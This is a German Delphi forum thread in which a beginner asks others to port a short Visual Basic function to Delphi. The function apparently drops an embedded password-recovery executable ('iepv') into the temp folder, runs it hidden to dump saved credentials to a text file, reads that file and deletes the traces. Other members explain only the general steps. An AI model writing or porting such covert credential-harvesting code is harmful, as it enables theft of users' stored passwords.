AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren

Delphi Varibalentyp / VB- Byte

Ein Thema von k00ky · begonnen am 28. Mär 2010 · letzter Beitrag vom 28. Mär 2010
Thema geschlossen
Seite 1 von 2  1 2   
k00ky

Registriert seit: 28. Nov 2009
12 Beiträge
 
#1

Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 14:32
Hi ich hab einen Source gefunden der allerdings in VB ist. Würde den nun gerne in Delphi umwandeln. Hab mir das alles angeschaut und sollte eigentlich kein Problem sein. Das einzige Problem was ich jetzt habe ist, dass es in dem Source einen Varibalen Typ "Byte" gibt und ich nicht weis wie ich das nun in Delphi abwandeln soll ?!

Sieht so aus: Dim RessourceDatei() As Byte

Kann mir da jemand helfen?
 
Teekeks

Registriert seit: 19. Okt 2008
Ort: Dresden
765 Beiträge
 
FreePascal / Lazarus
 
#2

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 14:34
den Datentyp byte gibt es auch bei Delphi...
Peter
"Div by zero Error" oder auch: "Es geht auch ohne Signatur!".
 
Klaus01
Online

Registriert seit: 30. Nov 2005
Ort: München
5.655 Beiträge
 
Delphi 10.4 Sydney
 
#3

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 14:35
.. vielleicht so?
ResourceDatei: Array of Byte; Grüße
Klaus
Klaus
 
k00ky

Registriert seit: 28. Nov 2009
12 Beiträge
 
#4

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 14:42
Oha danke.
Aba ich hab mir das alles etwas lechter vorgestellt mit dem umwandeln : /

Könnte mir diesbezüglich vlt jemand helfen?

Code:
 Function lesen() As String
        Dim Data As String
        Dim ExeDateiname As String = "\datei.exe"
        Dim TextDateiname As String = "\textdatei.txt"
        Dim RessourceDatei() As Byte = My.Resources.iepv
        FileOpen(1, Environ("tmp") & ExeDateiname, OpenMode.Binary)
        FilePut(1, RessourceDatei)
        FileClose(1)
        Shell(Environ("tmp") & ExeDateiname & " /stext " & Environ("tmp") & _
        TextDateiname, AppWinStyle.Hide)
        Data = IO.File.ReadAllText(Environ("tmp") & TextDateiname)
        On Error Resume Next
        IO.File.Delete(Environ("tmp") & ExeDateiname)
        IO.File.Delete(Environ("tmp") & TextDateiname)
        Return Data
    End Function
Wäre dankbar

[edit=Luckie]Zitat-Tags durch Code-Tags ersetzt. Mfg, Luckie[/edit]
 
Benutzerbild von himitsu
himitsu

Registriert seit: 11. Okt 2003
Ort: Elbflorenz
39.134 Beiträge
 
Delphi 10.4 Sydney
 
#5

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 14:54
hmmmmm, also es wird
- ein Dateiinhalt aus den Resourcen in eine temporäre Datei gespeichert (1)
- jene Datei wird dann "versteckt" als EXE ausgeführt (2)
- die EXE erstellt dann eine Textdatei,
- welche eingelesen und ihr Inhalt als String zurückgegeben wird (3)
- und am Ende werden beide Dateien wieder gelöscht

Ich denke mal, wenn man sich das so aufteilt, dann sollte man "leicht" etwas passendes in Delphi selber schreiben können.

1: TResourceStream
2: ShellExecute
3: TFileStream oder gar TStringStream
Garbage Collector ... Delphianer erzeugen keinen Müll, also brauchen sie auch keinen Müllsucher.
Delphi-Tage 2005-2014
 
k00ky

Registriert seit: 28. Nov 2009
12 Beiträge
 
#6

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 15:13
Ich bin erst ein beginner in Delphi. Hab erst vor paar tagen angefangen : /
Das was ich monentan zusammengebracht hab ist ein exe pumper. Aber damit bich überfordert.

Wäre nett wenn das jemand umwandeln könnte.
 
k00ky

Registriert seit: 28. Nov 2009
12 Beiträge
 
#7

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 16:29
kann das keiner machen : /?
 
daywalker9

Registriert seit: 1. Jan 2010
Ort: Leer
594 Beiträge
 
Delphi XE3 Professional
 
#8

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 16:32
Vielleicht solltest du dir erstmal die Tutorials angucken und die wichtigsten Grundlagen lernen : Delphi-Treff
Lars
 
k00ky

Registriert seit: 28. Nov 2009
12 Beiträge
 
#9

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 16:49
Ich brauch doch nur die paar Zeilen code hier von VB in dElphi gewandelt^^. mehr nicht
 
Teekeks

Registriert seit: 19. Okt 2008
Ort: Dresden
765 Beiträge
 
FreePascal / Lazarus
 
#10

Re: Delphi Varibalentyp / VB- Byte

  Alt 28. Mär 2010, 16:52
schon, aber um das machen zu können musst du zuerst Delphi können.
Ich bezweifle das hier irgendwer einfach so alles mögliche übersetzt.
Und Hilfe hast du ja schon erhalten von himitsu
Peter
"Div by zero Error" oder auch: "Es geht auch ohne Signatur!".
 
Thema geschlossen
Seite 1 von 2  1 2   

Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht

Forumregeln

Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Gehe zu:

Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 19:31 Uhr.
Powered by vBulletin® Copyright ©2000 - 2022, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2021 by Daniel R. Wolf